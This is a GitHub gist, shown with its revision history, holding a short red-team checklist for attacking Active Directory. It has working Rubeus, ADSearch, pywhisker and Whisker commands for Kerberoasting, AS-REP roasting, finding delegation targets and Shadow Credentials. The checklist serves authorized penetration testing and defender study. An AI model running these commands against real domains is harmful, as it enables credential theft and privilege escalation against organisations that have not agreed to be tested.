Last active
February 15, 2025 06:33
-
-
Save swtornio/2ecaff24249941e2678f02ac320b5f9b to your computer and use it in GitHub Desktop.
Revisions
-
swtornio revised this gist
Feb 15, 2025 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -28,7 +28,7 @@ Find all computers permitted for constrained delegation (can also be found from ## Resource-based Constrained Delegation Check MachineAccountQuota for quick win ## Shadow Credentials -
Feb 15, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,38 @@ # Red Team Checklist ## Kerberoasting Find SPNS (can also be found from ADExplorer snapshot) `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName` Roast individually `C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap` ## ASREP Roasting Find accounts without pre-auth enabled (can also be found from ADExplorer snapshot) `:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname` Roast individually `C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap`` ## Unconstrained Delegation Find all computers permitted for unconstrained delegation (can also be found from ADExplorer snapshot) `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname` ## Constrained Delegation Find all computers permitted for constrained delegation (can also be found from ADExplorer snapshot) `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json` ## Resource-based Constrained Delegation Check MachineAccountQuota ## Shadow Credentials If `msDS-KeyCredentialLink` is writable for this object, can obtain a TGT `pywhisker.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET" --action "list"` `C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc$`